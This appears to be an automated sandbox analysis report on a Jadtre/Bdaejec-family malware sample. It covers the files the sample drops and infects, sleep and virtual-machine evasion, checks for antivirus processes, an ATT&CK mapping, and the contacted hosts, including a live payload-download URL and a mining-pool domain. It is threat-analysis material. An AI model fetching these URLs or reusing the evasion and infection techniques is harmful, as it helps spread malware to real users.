Source: C:\Windows\SGuard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SGuard.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SGuard.exe

Thread delayed: delay time: 7200000

Source: C:\Windows\SGuard.exe

Window / User API: threadDelayed 1800

Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\winoshelper.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_1-1051

Source: C:\Windows\SGuard.exe TID: 7128	Thread sleep count: 111 > 30	Jump to behavior
Source: C:\Windows\SGuard.exe TID: 7128	Thread sleep time: -13320000s >= -30000s	Jump to behavior
Source: C:\Windows\SGuard.exe TID: 7128	Thread sleep count: 125 > 30	Jump to behavior
Source: C:\Windows\SGuard.exe TID: 7128	Thread sleep time: -900000000s >= -30000s	Jump to behavior
Source: C:\Windows\SGuard.exe TID: 5040	Thread sleep count: 1800 > 30	Jump to behavior
Source: C:\Windows\SGuard.exe TID: 5040	Thread sleep time: -36000s >= -30000s	Jump to behavior

Source: C:\Windows\SGuard.exe	Last function: Thread delayed
Source: C:\Windows\SGuard.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe

Code function: 1_2_000B1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 000B1754h

1_2_000B1718

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_10004333 FindFirstFileW,FindClose,		0_2_10004333
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	Code function: 1_2_000B29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		1_2_000B29E2

Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe

Code function: 1_2_000B2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_000B2B8C

Source: C:\Windows\SGuard.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Windows\SGuard.exe	Thread delayed: delay time: 7200000			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: VSFdoO.exe, 00000001.00000002.2145793925.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000003.1696529803.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000003.1696529803.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000002.2145793925.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000003.1696529803.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000002.2145793925.0000000000E47000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	API call chain: ExitProcess graph end node	graph_0-6433
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	API call chain: ExitProcess graph end node	graph_0-5640
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	API call chain: ExitProcess graph end node	graph_0-6430
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	API call chain: ExitProcess graph end node	graph_0-6661
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	API call chain: ExitProcess graph end node	graph_0-6511
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	API call chain: ExitProcess graph end node	graph_0-6457
Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe	API call chain: ExitProcess graph end node	graph_1-1025

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_03C3FAAB LdrInitializeThunk,

2_2_03C3FAAB

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

Code function: 0_2_004010DF LoadLibraryA,GetProcAddress,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_00531044 mov eax, dword ptr fs:[00000030h]		0_2_00531044
Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe	Code function: 0_2_100018E3 mov esi, dword ptr fs:[00000030h]		0_2_100018E3

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

Code function: 0_2_004021A0 GetProcessHeap,

0_2_004021A0

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6668 -ip 6668			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6668 -s 1640			Jump to behavior

Source: SciTE.exe.1.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exe

Code function: 0_2_00403110 cpuid

0_2_00403110

Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe

Code function: 1_2_000B1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,

1_2_000B1718

Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exe

Code function: 1_2_000B139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

1_2_000B139F

Source: LisectAVT_2403002B_48.exe, LisectAVT_2403002B_48.exe, 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmp, svchost.exe, 00000002.00000002.4147090865.0000000010113000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: kxetray.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: LisectAVT_2403002B_48.exe, LisectAVT_2403002B_48.exe, 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmp, svchost.exe, 00000002.00000002.4147090865.0000000010113000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: 360tray.exe
Source: Amcache.hve.1.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: VSFdoO.exe PID: 6668, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: VSFdoO.exe PID: 6668, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	21 Obfuscated Files or Information	11 Input Capture	11 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Service Execution	1 Valid Accounts	1 Valid Accounts	131 Software Packing	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	11 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	13 Windows Service	11 Access Token Manipulation	1 DLL Side-Loading	Security Account Manager	13 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	13 Windows Service	121 Masquerading	NTDS	21 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 Valid Accounts	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	3 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Access Token Manipulation	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LisectAVT_2403002B_48.exe	100%	Avira	W32/Jadtre.B
LisectAVT_2403002B_48.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\SGuard.exe	100%	Avira	HEUR/AGEN.1313076
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Roaming\winoshelper.dll	100%	Avira	TR/ATRAPS.Gen
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\VSFdoO.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Windows\SGuard.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\winoshelper.dll	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\VSFdoO.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.scintilla.org/scite.rng	0%	URL Reputation	safe
http://www.rftp.comJosiah	0%	URL Reputation	safe
http://www.activestate.com	0%	URL Reputation	safe
http://www.activestate.comHolger	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://www.rftp.com	0%	URL Reputation	safe
http://www.baanboard.comBrendon	0%	URL Reputation	safe
https://www.smartsharesystems.com/	0%	URL Reputation	safe
http://www.scintilla.org	0%	URL Reputation	safe
http://www.spaceblue.comMathias	0%	URL Reputation	safe
https://www.smartsharesystems.com/Morten	0%	URL Reputation	safe
http://www.develop.com	0%	URL Reputation	safe
http://www.lua.org	0%	URL Reputation	safe
http://ddos.dnsnb8.net/	100%	URL Reputation	malware
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	URL Reputation	malware
http://www.spaceblue.com	0%	URL Reputation	safe
http://www.baanboard.com	0%	URL Reputation	safe
http://www.develop.comDeepak	0%	URL Reputation	safe
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k1.rar8T.	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rary	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarP	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rart	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.raru	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarPTF	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarqT	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
auto.c3pool.org	5.75.158.61	true	true		unknown
ddos.dnsnb8.net	44.221.84.105	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.scintilla.org/scite.rng	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rary	VSFdoO.exe, 00000001.00000002.2145793925.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.rftp.comJosiah	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.activestate.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.raru	VSFdoO.exe, 00000001.00000002.2145793925.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.activestate.comHolger	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rart	VSFdoO.exe, 00000001.00000002.2145793925.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	VSFdoO.exe, 00000001.00000003.1688795553.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarP	VSFdoO.exe, 00000001.00000002.2146492689.000000000293A000.00000004.00000010.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar8T.	VSFdoO.exe, 00000001.00000003.1696529803.0000000000E32000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://upx.sf.net	Amcache.hve.1.dr	false	URL Reputation: safe	unknown
http://www.rftp.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.baanboard.comBrendon	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.scintilla.org	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarPTF	VSFdoO.exe, 00000001.00000003.1696529803.0000000000E32000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.develop.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.lua.org	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
